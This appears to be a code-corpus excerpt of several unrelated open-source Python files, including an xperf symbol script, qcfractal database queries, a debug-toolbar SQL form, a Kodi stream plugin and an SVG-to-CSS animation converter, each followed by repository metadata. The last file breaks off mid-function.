if output:
print(" %s" % output, end="")
if not os.path.exists(dest_path):
print("Aborting symbol generation because stripped PDB '%s' does not exist. WPA symbol loading may be slow." % dest_path)
sys.exit(0)
else:
print(" Symbols retrieved.")
else:
print(" Failed to retrieve symbols.")
if tempdirs:
symbol_path = ";".join(tempdirs)
print("Stripped PDBs are in %s. Converting to symcache files now." % symbol_path)
os.environ["_NT_SYMBOL_PATH"] = symbol_path
# Create a list of to/from renamed tuples
renames = []
error = False
try:
rename_errors = False
for local_pdb in local_symbol_files:
temp_name = local_pdb + "x"
print("Renaming %s to %s to stop unstripped PDBs from being used." % (local_pdb, temp_name))
try:
# If the destination file exists we have to rename it or else the
# rename will fail.
if os.path.exists(temp_name):
os.remove(temp_name)
os.rename(local_pdb, temp_name)
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s to %s. Continuing.\n%s" % (local_pdb, temp_name, e))
rename_errors = True
else:
renames.append((local_pdb, temp_name))
#-build = build the symcache store for this trace (see xperf -help symcache)
if rename_errors:
print("Skipping symbol generation due to PDB rename errors. WPA symbol loading may be slow.")
else:
gen_command = 'xperf -i "%s" -symbols -tle -tti -a symcache -build' % tracename
print("> %s" % gen_command)
for line in os.popen(gen_command).readlines():
pass # Don't print line
except KeyboardInterrupt:
# Catch Ctrl+C exception so that PDBs will get renamed back.
if renames:
print("Ctrl+C detected. Renaming PDBs back.")
error = True
for rename_names in renames:
try:
os.rename(rename_names[1], rename_names[0])
except:
# Rename can and does throw exceptions. We must catch and continue.
e = sys.exc_info()[0]
print("Hit exception while renaming %s back. Continuing.\n%s" % (rename_names[1], e))
for symcache_file in symcache_files:
if os.path.exists(symcache_file):
print("%s generated." % symcache_file)
else:
print("Error: %s not generated." % symcache_file)
error = True
# Delete the stripped PDB files
if error:
print("Retaining PDBs to allow rerunning xperf command-line.")
print("If re-running the command be sure to go:")
print("set _NT_SYMBOL_PATH=%s" % symbol_path)
else:
for directory in tempdirs:
shutil.rmtree(directory, ignore_errors=True)
elif strip_and_translate:
if found_uncached:
print("No PDBs copied, nothing to do.")
else:
print("No uncached PDBS found, nothing to do.")
if __name__ == "__main__":
main()
| apache-2.0 | 8,157,729,412,689,827,000 | 44.795222 | 151 | 0.651448 | false | 3.702674 | false | false | false |
Loreton/MP3Catalog | Source/Project/ExcelDB/ExcelCatalog.py | 1 | 1400 | #!/usr/bin/python
# -*- coding: iso-8859-1 -*-
#
# Scope: Program for ...........
# by Loreto Notarantonio 2013, February
# ######################################################################################
import os, sys
import ast
################################################################################
# - M A I N
# - Includes:
# -     2 - Input parameter checking
# -     5 - Call to the project's main program
################################################################################
def ReadExcelDB(gv, xlsFile, rangeToProcess):
logger = gv.Ln.SetLogger(package=__name__)
C = gv.Ln.LnColor()
csvFileInput = xlsFile.rsplit('.', -1)[0] + '.csv'
logger.debug('XLS file name: {0}'.format(xlsFile))
logger.debug('CSV file name: {0}'.format(csvFileInput))
    # - If the CSV is older than the XLS, do the export
if gv.Ln.Fmtime(xlsFile) > gv.Ln.Fmtime(csvFileInput):
msg= 'range To process: {0}'.format(rangeToProcess)
logger.debug(msg); print(msg)
mydata = gv.Ln.Excel(xlsFile)
mydata.exportCSV('Catalog', outFname=csvFileInput, rangeString=rangeToProcess, colNames=4, fPRINT=True)
else:
msg = 'excel file is older than CSV file. No export will take place.'
logger.debug(msg); print(msg)
return csvFileInput
| unlicense | -2,451,188,132,575,044,000 | 32.333333 | 111 | 0.502143 | false | 3.655352 | false | false | false |
psi4/mongo_qcdb | qcfractal/storage_sockets/db_queries.py | 1 | 14717 | from typing import List, Optional, Set, Union
from sqlalchemy import Integer, inspect
from sqlalchemy.sql import bindparam, text
from qcfractal.interface.models import Molecule, ResultRecord
from qcfractal.storage_sockets.models import MoleculeORM, ResultORM
QUERY_CLASSES = set()
class QueryBase:
# The name/alias used by the REST APIs to access this class
_class_name = None
_available_groupby = set()
# Mapping of the requested feature and the internal query method
_query_method_map = {}
def __init__(self, database_name, max_limit=1000):
self.database_name = database_name
self.max_limit = max_limit
def __init_subclass__(cls, **kwargs):
if cls not in QUERY_CLASSES:
QUERY_CLASSES.add(cls)
super().__init_subclass__(**kwargs)
def query(self, session, query_key, limit=0, skip=0, include=None, exclude=None, **kwargs):
if query_key not in self._query_method_map:
raise TypeError(f"Query type {query_key} is unimplemented for class {self._class_name}")
self.session = session
return getattr(self, self._query_method_map[query_key])(**kwargs)
def execute_query(self, sql_statement, with_keys=True, **kwargs):
"""Execute sql statemet, apply limit, and return results as dict if needed"""
# TODO: check count first, way to iterate
# sql_statement += f' LIMIT {self.max_limit}'
result = self.session.execute(sql_statement, kwargs)
keys = result.keys() # get keys before fetching
result = result.fetchall()
self.session.commit()
# create a list of dict with the keys and values of the results (instead of tuples)
if with_keys:
result = [dict(zip(keys, res)) for res in result]
return result
def _base_count(self, table_name: str, available_groupbys: Set[str], groupby: Optional[List[str]] = None):
if groupby:
bad_groups = set(groupby) - available_groupbys
if bad_groups:
raise AttributeError(f"The following groups are not permissible: {missing}")
global_str = ", ".join(groupby)
select_str = global_str + ", "
extra_str = f"""GROUP BY {global_str}\nORDER BY {global_str}"""
else:
select_str = ""
extra_str = ""
sql_statement = f"""
select {select_str}count(*) from {table_name}
{extra_str}
"""
ret = self.execute_query(sql_statement, with_keys=True)
if groupby:
return ret
else:
return ret[0]["count"]
    @classmethod
    def _raise_missing_attribute(cls, query_key, missing_attribute, amend_msg=""):
"""Raises error for missing attribute in a message suitable for the REST user"""
raise AttributeError(f"To query {cls._class_name} for {query_key} " f"you must provide {missing_attribute}.")
# ----------------------------------------------------------------------------
class TaskQueries(QueryBase):
_class_name = "task"
_query_method_map = {"counts": "_task_counts"}
def _task_counts(self):
sql_statement = f"""
SELECT tag, priority, status, count(*)
FROM task_queue
WHERE True
group by tag, priority, status
order by tag, priority, status
"""
return self.execute_query(sql_statement, with_keys=True)
# ----------------------------------------------------------------------------
class DatabaseStatQueries(QueryBase):
_class_name = "database_stats"
_query_method_map = {
"table_count": "_table_count",
"database_size": "_database_size",
"table_information": "_table_information",
}
def _table_count(self, table_name=None):
if table_name is None:
self._raise_missing_attribute("table_name", "table name")
sql_statement = f"SELECT count(*) from {table_name}"
return self.execute_query(sql_statement, with_keys=False)[0]
def _database_size(self):
sql_statement = f"SELECT pg_database_size('{self.database_name}')"
return self.execute_query(sql_statement, with_keys=True)[0]["pg_database_size"]
def _table_information(self):
sql_statement = f"""
SELECT relname AS table_name
, c.reltuples::BIGINT AS row_estimate
, pg_total_relation_size(c.oid) AS total_bytes
, pg_indexes_size(c.oid) AS index_bytes
, pg_total_relation_size(reltoastrelid) AS toast_bytes
FROM pg_class c
LEFT JOIN pg_namespace n ON n.oid = c.relnamespace
WHERE relkind = 'r';
"""
result = self.execute_query(sql_statement, with_keys=False)
ret = []
for row in result:
if ("pg_" in row[0]) or ("sql_" in row[0]):
continue
ret.append(list(row))
ret = {"columns": ["table_name", "row_estimate", "total_bytes", "index_bytes", "toast_bytes"], "rows": ret}
return ret
class ResultQueries(QueryBase):
_class_name = "result"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = {"result_type", "status"}
return self._base_count("base_result", available_groupbys, groupby=groupby)
class MoleculeQueries(QueryBase):
_class_name = "molecule"
_query_method_map = {"count": "_count"}
def _count(self, groupby: Optional[List[str]] = None):
available_groupbys = set()
return self._base_count("molecule", available_groupbys, groupby=groupby)
# ----------------------------------------------------------------------------
class TorsionDriveQueries(QueryBase):
_class_name = "torsiondrive"
_query_method_map = {
"initial_molecules": "_get_initial_molecules",
"initial_molecules_ids": "_get_initial_molecules_ids",
"final_molecules": "_get_final_molecules",
"final_molecules_ids": "_get_final_molecules_ids",
"return_results": "_get_return_results",
}
def _get_initial_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules_ids", "torsion drive id")
sql_statement = f"""
select initial_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_initial_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("initial_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_final_molecules_ids(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules_ids", "torsion drive id")
sql_statement = f"""
select final_molecule from optimization_procedure as opt where opt.id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
order by opt.id
"""
return self.execute_query(sql_statement, with_keys=False)
def _get_final_molecules(self, torsion_id=None):
if torsion_id is None:
self._raise_missing_attribute("final_molecules", "torsion drive id")
sql_statement = f"""
select molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in
(select opt_id from optimization_history where torsion_id = {torsion_id})
"""
return self.execute_query(sql_statement, with_keys=True)
def _get_return_results(self, torsion_id=None):
"""All return results ids of a torsion drive"""
if torsion_id is None:
self._raise_missing_attribute("return_results", "torsion drive id")
sql_statement = f"""
select opt_res.opt_id, result.id as result_id, result.return_result from result
join opt_result_association as opt_res
on result.id = opt_res.result_id
where opt_res.opt_id in
(
select opt_id from optimization_history where torsion_id = {torsion_id}
)
"""
return self.execute_query(sql_statement, with_keys=False)
class OptimizationQueries(QueryBase):
_class_name = "optimization"
_exclude = ["molecule_hash", "molecular_formula", "result_type"]
_query_method_map = {
"all_results": "_get_all_results",
"final_result": "_get_final_results",
"initial_molecule": "_get_initial_molecules",
"final_molecule": "_get_final_molecules",
}
def _remove_excluded_keys(self, data):
for key in self._exclude:
data.pop(key, None)
def _get_all_results(self, optimization_ids: List[Union[int, str]] = None):
"""Returns all the results objects (trajectory) of each optmization
Returns list(list) """
if optimization_ids is None:
self._raise_missing_attribute("all_results", "List of optimizations ids")
# row_to_json(result.*)
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join opt_result_association as traj
on result.id = traj.result_id
where traj.opt_id in :optimization_ids
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
if key not in ret:
ret[key] = []
ret[key].append(ResultRecord(**rec))
return ret
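    # The mapping returned above is {opt_id: [ResultRecord, ...]}, one trajectory
    # list per requested optimization id.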
def _get_final_results(self, optimization_ids: List[Union[int, str]] = None):
"""Return the actual results objects of the best result in each optimization"""
if optimization_ids is None:
self._raise_missing_attribute("final_result", "List of optimizations ids")
sql_statement = text(
"""
select * from base_result
join (
select opt_id, result.* from result
join (
select opt.opt_id, opt.result_id, max_pos from opt_result_association as opt
inner join (
select opt_id, max(position) as max_pos from opt_result_association
where opt_id in :optimization_ids
group by opt_id
) opt2
on opt.opt_id = opt2.opt_id and opt.position = opt2.max_pos
) traj
on result.id = traj.result_id
) result
on base_result.id = result.id
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(ResultORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
ret[key] = ResultRecord(**rec)
return ret
def _get_initial_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("initial_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.initial_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
def _get_final_molecules(self, optimization_ids=None):
if optimization_ids is None:
self._raise_missing_attribute("final_molecule", "List of optimizations ids")
sql_statement = text(
"""
select opt.id as opt_id, molecule.* from molecule
join optimization_procedure as opt
on molecule.id = opt.final_molecule
where opt.id in :optimization_ids
"""
)
# bind and expand ids list
sql_statement = sql_statement.bindparams(bindparam("optimization_ids", expanding=True))
# column types:
columns = inspect(MoleculeORM).columns
sql_statement = sql_statement.columns(opt_id=Integer, *columns)
query_result = self.execute_query(sql_statement, optimization_ids=list(optimization_ids))
ret = {}
for rec in query_result:
self._remove_excluded_keys(rec)
key = rec.pop("opt_id")
rec = {k: v for k, v in rec.items() if v is not None}
ret[key] = Molecule(**rec)
return ret
| bsd-3-clause | -2,396,430,855,391,345,700 | 32.523918 | 117 | 0.575865 | false | 4.10516 | false | false | false |
wojtex/cantionale | title_index.py | 1 | 1914 |
class TitleIndex:
def __init__(self, songbook, params):
self.title = ''
self.filter = lambda x : True
if 'title' in params: self.title = params['title']
if 'filter' in params: self.filter = params['filter']
def draw(self, canvas, songbook):
sb = songbook
st = sb.style
c = canvas
wdt = sb.width
position = sb.height - st.title_index_margin_top
c.setFont(st.title_index_title_font_name, st.title_index_title_font_size)
for line in self.title.strip().split(sep='\n'):
position -= st.title_index_title_line_height
c.drawCentredString(wdt/2, position, line)
position -= st.title_index_title_song_spacing
songs = []
for section in songbook.sections:
for no, song in enumerate(section.songs):
if self.filter((no,song)):
songs.append((song.title, section.index(no+1)))
songs.sort()
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.toc_margin_inner
margin_right = st.toc_margin_outer
lh = st.title_index_song_line_height
for title, index in songs:
if lh + st.title_index_margin_bottom > position:
c.showPage()
position = sb.height - st.title_index_margin_top
if sb.is_left_page(c):
margin_left = st.title_index_margin_outer
margin_right = st.title_index_margin_inner
else:
margin_left = st.title_index_margin_inner
margin_right = st.title_index_margin_outer
position -= st.title_index_song_song_spacing
position -= lh
c.setFont(st.title_index_song_number_font_name, st.title_index_song_number_font_size)
c.drawRightString(st.title_index_song_number_indent + margin_left, position, index)
c.setFont(st.title_index_song_title_font_name, st.title_index_song_title_font_size)
c.drawString(st.title_index_song_title_indent + margin_left, position, title)
c.showPage()
if sb.is_left_page(c):
c.showPage()
| mit | -7,055,911,410,535,979,000 | 33.178571 | 88 | 0.692268 | false | 2.835556 | false | false | false |
mvaled/sentry | src/debug_toolbar/panels/sql/forms.py | 1 | 2785 | from __future__ import absolute_import, unicode_literals
import json
import hashlib
from django import forms
from django.conf import settings
from django.db import connections
from django.utils.encoding import force_text
from django.utils.functional import cached_property
from django.core.exceptions import ValidationError
from debug_toolbar.panels.sql.utils import reformat_sql
class SQLSelectForm(forms.Form):
"""
Validate params
sql: The sql statement with interpolated params
raw_sql: The sql statement with placeholders
params: JSON encoded parameter values
duration: time for SQL to execute passed in from toolbar just for redisplay
hash: the hash of (secret + sql + params) for tamper checking
"""
sql = forms.CharField()
raw_sql = forms.CharField()
params = forms.CharField()
alias = forms.CharField(required=False, initial="default")
duration = forms.FloatField()
hash = forms.CharField()
def __init__(self, *args, **kwargs):
initial = kwargs.get("initial", None)
if initial is not None:
initial["hash"] = self.make_hash(initial)
super(SQLSelectForm, self).__init__(*args, **kwargs)
for name in self.fields:
self.fields[name].widget = forms.HiddenInput()
def clean_raw_sql(self):
value = self.cleaned_data["raw_sql"]
if not value.lower().strip().startswith("select"):
raise ValidationError("Only 'select' queries are allowed.")
return value
def clean_params(self):
value = self.cleaned_data["params"]
try:
return json.loads(value)
except ValueError:
raise ValidationError("Is not valid JSON")
def clean_alias(self):
value = self.cleaned_data["alias"]
if value not in connections:
raise ValidationError("Database alias '%s' not found" % value)
return value
def clean_hash(self):
hash = self.cleaned_data["hash"]
if hash != self.make_hash(self.data):
raise ValidationError("Tamper alert")
return hash
def reformat_sql(self):
return reformat_sql(self.cleaned_data["sql"])
def make_hash(self, data):
items = [settings.SECRET_KEY, data["sql"], data["params"]]
# Replace lines endings with spaces to preserve the hash value
# even when the browser normalizes \r\n to \n in inputs.
items = [" ".join(force_text(item).splitlines()) for item in items]
return hashlib.sha1("".join(items).encode("utf-8")).hexdigest()
@property
def connection(self):
return connections[self.cleaned_data["alias"]]
@cached_property
def cursor(self):
return self.connection.cursor()
| bsd-3-clause | -6,826,950,877,515,031,000 | 28.946237 | 83 | 0.647038 | false | 4.311146 | false | false | false |
manusev/plugin.video.kuchitv | resources/regex/freebroadcast.py | 1 | 5105 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
# MonsterTV - XBMC Add-on by Juarrox ([email protected])
# Version 0.2.9 (18.07.2014)
#------------------------------------------------------------
# License: GPL (http://www.gnu.org/licenses/gpl-3.0.html)
# Thanks to Jesús's plugintools library (www.mimediacenter.info)
import os
import sys
import urllib
import urllib2
import re
import shutil
import zipfile
import time
import xbmc
import xbmcgui
import xbmcaddon
import xbmcplugin
import plugintools
import json
addonName = xbmcaddon.Addon().getAddonInfo("name")
addonVersion = xbmcaddon.Addon().getAddonInfo("version")
addonId = xbmcaddon.Addon().getAddonInfo("id")
addonPath = xbmcaddon.Addon().getAddonInfo("path")
# Function that drives the process of building the original stream URL
def freebroadcast(params):
plugintools.log("[MonsterTV-0.3.0].freebroadcast "+repr(params))
url_user = {}
    # Build the dictionary of URL parameters...
url = params.get("url")
url_extracted = url.split(" ")
for entry in url_extracted:
if entry.startswith("rtmp"):
entry = entry.replace("rtmp=", "")
url_user["rtmp"]=entry
elif entry.startswith("playpath"):
entry = entry.replace("playpath=", "")
url_user["playpath"]=entry
elif entry.startswith("swfUrl"):
entry = entry.replace("swfUrl=", "")
url_user["swfurl"]=entry
elif entry.startswith("pageUrl"):
entry = entry.replace("pageUrl=", "")
url_user["pageurl"]=entry
elif entry.startswith("token"):
entry = entry.replace("token=", "")
url_user["token"]=entry
elif entry.startswith("referer"):
entry = entry.replace("referer=", "")
url_user["referer"]=entry
plugintools.log("URL_user dict= "+repr(url_user))
pageurl = url_user.get("pageurl")
    # Handle both URL cases: a single link (pageUrl) or a full rtmp:// link
if pageurl is None:
pageurl = url_user.get("url")
referer= url_user.get("referer")
if referer is None:
referer = 'http://www.juanin.tv'
# channel_id = re.compile('channel=([^&]*)').findall(pageurl)
# print channel_id
# channel_id = channel_id[0]
pageurl = 'http://freebroadcast.pw/embed/embed.php?n=' + url_user.get("playpath") + '&w=670&h=400'
url_user["pageurl"]=pageurl
print 'pageurl',pageurl
print 'referer',referer
body = gethttp_headers(pageurl, referer)
getparams_freebroadcast(url_user, body)
url = url_user.get("ip") + ' playpath=' + url_user.get("playpath") + ' swfUrl=http://freebroadcast.pw/player/player.swf pageUrl=' + url_user.get("pageurl") + ' live=1 timeout=10'
plugintools.play_resolved_url(url)
# Make a request to the pageUrl
def gethttp_headers(pageurl, referer):
request_headers=[]
request_headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.65 Safari/537.31"])
# request_headers.append(["Referer",referer])
body,response_headers = plugintools.read_body_and_headers(pageurl, headers=request_headers)
plugintools.log("body= "+body)
return body
# Start the protocol for building the original URL
# Capture the correct parameters
def getparams_freebroadcast(url_user, body):
plugintools.log("[MonsterTV-0.3.0].getparams_freebroadcast " + repr(url_user) )
    # Build the 9stream dictionary
entry = plugintools.find_single_match(body, 'setStream(token) {(.*?)}')
ip = re.compile("streamer', \'(.*?)\'").findall(body)
url_user["ip"]=str(ip[0])
plugintools.log("IP= "+str(ip[0]))
# Capture the playpath
def getfile_freebroadcast(url_user, decoded, body):
plugintools.log("MonsterTV getfile_freebroadcast( "+repr(url_user))
referer = url_user.get("referer")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer', referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
file = re.compile("file': '([^.]*)").findall(data)
print 'file',file
return file
# Capture fileserver.php (the server token)
def get_fileserver(decoded, url_user):
plugintools.log("MonsterTV fileserver "+repr(url_user))
referer=url_user.get("pageurl")
req = urllib2.Request(decoded)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36')
req.add_header('Referer',referer)
response = urllib2.urlopen(req)
print response
data = response.read()
print data
token = re.compile('token":"(.*)"').findall(data)
print 'token',token
return token
| gpl-2.0 | 6,524,703,570,245,585,000 | 34.395833 | 182 | 0.627232 | false | 3.400267 | false | false | false |
soybean217/lora-python | UServer/admin_server/admin_data_update/model/gateway_locaton_data.py | 1 | 1618 | # _*_ coding:utf-8 _*_
from database.db4 import db4, Channel4, ConstDB4
from utils.log import Logger, Action
class Location:
channel_name = Channel4.gis_gateway_location + '*'
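    # The trailing '*' makes this a Redis pattern subscription, so messages from every
    # per-gateway channel ("<prefix>:<gateway_id>", judging by the split below) are received.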
def __init__(self):
self.ps = db4.pubsub()
def psubscribe_gis(self):
self.ps.psubscribe(self.channel_name)
return self.ps
def stop_listen(self):
if hasattr(self, 'ps'):
self.ps.punsubscribe()
def listen_gis_gateway_location(self):
Logger.info(Action.listen, 'psubscribe', self.channel_name, 'Begin listen')
ps_init = self.psubscribe_gis()
for item in ps_init.listen():
if item is not None:
if item['type'] == 'pmessage':
Logger.info(Action.listen, item['channel'].decode(), 'MESSAGE', item['data'].decode())
gateway_id = item['channel'].decode().split(':')[1]
location_data = item['data'].decode().split(',')
if len(location_data) == 3:
lng = float(location_data[0])
lat = float(location_data[1])
alt = int(location_data[2])
msg = self.Object(gateway_id, lat=lat, lng=lng, alt=alt)
yield msg
else:
Logger.info(Action.listen, item['channel'].decode(), item['type'], item['data'])
class Object:
def __init__(self, gw_id, lat, lng, alt):
self.gateway_id = gw_id
self.latitude = lat
self.longitude = lng
self.altitude = alt
| mit | -8,514,074,294,372,980,000 | 34.173913 | 106 | 0.520396 | false | 4.00495 | false | false | false |
geishatokyo-lightning/lightning | lightning_core/vg/cssanim.py | 1 | 14273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2011 Geisha Tokyo Entertainment, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
# the Software, and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
# FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
# COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
# AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import with_statement
import os
import sys
from lxml import etree
from copy import deepcopy
from parser import *
from StringIO import StringIO
import logging
import simplejson as json
import re
from collections import deque
from copy import deepcopy
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S')
class CssElement(dict):
def __init__(self, title=''):
super(CssElement, self).__init__()
self.common_element = {
'position' : ['position', 'absolute'],
'transform': ['-webkit-transform', None],
'origin' : ['-webkit-transform-origin', '0.0px 0.0px'],
}
self.animation_element = {
'name' : ['-webkit-animation-name', None],
'timing' : ['-webkit-animation-timing-function', 'linear'],
'count' : ['-webkit-animation-iteration-count', 'infinite'],
'duration' : ['-webkit-animation-duration', None],
}
self.shape_element = {
'left' : ['left' , None],
'top' : ['top' , None],
'width' : ['width' , None],
'height' : ['height' , None],
}
self.title = title
self.sp = '\n' # splitter
def __str__(self):
content = self.sp.join(['%s: %s;' % (k,v) for k,v in self.iteritems()])
return '%s {%s%s%s}%s' % (self.title, self.sp, content, self.sp, self.sp)
def add_anims_element(self, key, anim_length, has_anim_name):
self.animation_element['name'][1] = key
self.animation_element['duration'][1] = '%fs'%(float(anim_length)/12.0)
if not has_anim_name:
del self.animation_element['name']
self.update(self.animation_element.values())
self.update(self.common_element.values())
def add_shape_element(self, shape_key, shape_table):
def calc_twips_to_pixel(twips):
return '%dpx' % int(round(float(twips)/20))
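        # Shape coordinates come from SWF data in twips (1/20 of a pixel), hence the /20.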
shape = shape_table[shape_key]
self.shape_element['left'][1] = calc_twips_to_pixel(shape.left)
self.shape_element['top'][1] = calc_twips_to_pixel(shape.top)
self.shape_element['width'][1] = calc_twips_to_pixel(shape.width)
self.shape_element['height'][1] = calc_twips_to_pixel(shape.height)
self.update(self.shape_element.values())
del self.common_element['origin']
def add_origin_element(self, matrix):
self.common_element['transform'][1] = matrix
self.update(self.common_element.values())
class SvgShape(object):
def __init__(self, elem):
self.obj = elem[0]
self.hash = elem[1]
self.left = int(elem[2])
self.top = int(elem[3])
self.width = int(elem[4])
self.height = int(elem[5])
self.symbol = ''
self.edges = []
self.defs =[]
def filename(self, dir_path='.'):
return os.path.join(dir_path, '%s_%s.svg' % (self.obj, self.hash))
class SvgTransform(Transform):
def __init__(self, attrib):
super(SvgTransform,self).__init__()
values = dict([(k,float(attrib[k])) if k in attrib else (k,None) for k in self.MATRIX])
self.set_items(values)
if 'depth' in attrib:
self.depth = int(attrib['depth'])
if 'ctf' in attrib:
self.ctf = ColorTransform([int(ctf.strip()) for ctf in attrib['ctf'].strip('[]').split(',') if ctf.strip().lstrip('-').isdigit()])
if 'clipDepth' in attrib:
self.clipDepth = int(attrib['clipDepth'])
if 'visible' in attrib and attrib['visible'] == 'False':
self.visible = False
def __eq__(self, other):
return [self.sx, self.sy, self.wx, self.wy, self.tx, self.ty, self.get_opacity()]==other
def write_matrix(self):
return self._shorten('matrix(%.6f,%.6f,%.6f,%.6f,%.6f,%.6f)' % self.get_matrix())
def write_matrix3d(self):
return self._shorten('matrix3d(%.6f,%.6f,0,0,%.6f,%.6f,0,0,0,0,1,0,%.6f,%.6f,0,1)' % (self.sx, self.wx, self.wy, self.sy, self.tx/20, self.ty/20))
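    # The matrix3d form embeds the same 2-D affine transform for CSS; tx/ty are
    # divided by 20 here to convert twips to CSS pixels.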
def write_webkit_transform(self):
return self._shorten('-webkit-transform: %s;' % self.write_matrix3d())
def _shorten(self, str):
return str.replace('.000000', '.0')
def get_opacity(self):
opacity = 1.0
if not self.visible:
opacity = 0.0
else:
if len(self.ctf) == 8:
c = Color([0,0,0,256])
c.transform(self.ctf)
opacity = (float(c.a) / 256.0)
return opacity
def write_visible(self):
return self._shorten('opacity: %.6f;' % self.get_opacity())
class AnimationManager(object):
def __init__(self, dir_path, basefilename):
self.dir_path = dir_path
self.shapes_filepath = self._get_path('shapes')
self.animation_filepath = self._get_path('animation.xml')
self.structure_filepath = self._get_path('structure.xml')
self.cssfilepath = os.path.join('.', basefilename + '.css')
self.htmlfilepath = os.path.join('.', basefilename + '.html')
        self.xmlfilename = os.path.basename(basefilename.replace('.svg', ''))
def _get_path(self, filename):
return os.path.join(self.dir_path, filename)
def load_shapes(self):
with open(self.shapes_filepath, 'r') as f:
return self.get_shapes(f.readlines())
def get_shapes(self, lines):
shape_table = {}
for line in lines:
elems = line.split(' ')
if len(elems) == 6: # 'shapes'
shape_table[elems[0]] = SvgShape(elems)
return shape_table
def load_animation(self):
root = self._parse_xml(self.animation_filepath)
return self.get_animation(root)
def get_animation(self, root):
anim_table = {}
for anim in root.xpath('//animation'):
key = anim.attrib['key'][:-2]
frames = anim.findall('frame')
anim_table[key] = [SvgTransform(frame.attrib) for frame in frames]
return anim_table
def load_structure(self, shape_table, parser_shapes):
root = self._parse_xml(self.structure_filepath)
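        # NOTE: get_structure() below takes (root, shape_table, anim_table, ctfsArray,
        # parser_shapes, ...); this call passes only three arguments and appears to
        # predate that signature.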
return self.get_structure(root, shape_table, parser_shapes)
def get_structure(self, root, shape_table, anim_table, ctfsArray, parser_shapes, mcname=None, key_prefix=""):
def get_parent_key(elem):
parent = elem.getparent()
if parent is not None and parent.attrib.has_key('class'):
p_attrib_cls = parent.attrib['class']
s = re.search('obj\d+', p_attrib_cls)
if s is not None:
return s.group()
else:
return ''
def update_elem(elem, key, name, hasClipDepth):
elem.tag = 'div'
elem.attrib.clear()
elem.attrib['class'] = key
if name is not None :
elem.attrib['id'] = name
if hasClipDepth:
elem.attrib['style'] = 'display:none;'
structure_table = {}
if mcname is None:
root_elem = root
else:
r = root.xpath('//part[@name="%s"]'%mcname)
if r is None:
root_elem = root
else:
root_elem = r[0]
for elem in root.xpath('//part'):
if 'key' in elem.attrib:
key = elem.attrib['key']
objId = LUtil.objectID_from_key(key)
depth = elem.attrib['depth']
hasClipDepth = 'clipDepth' in elem.attrib
name = elem.attrib['name'] if 'name' in elem.attrib else None
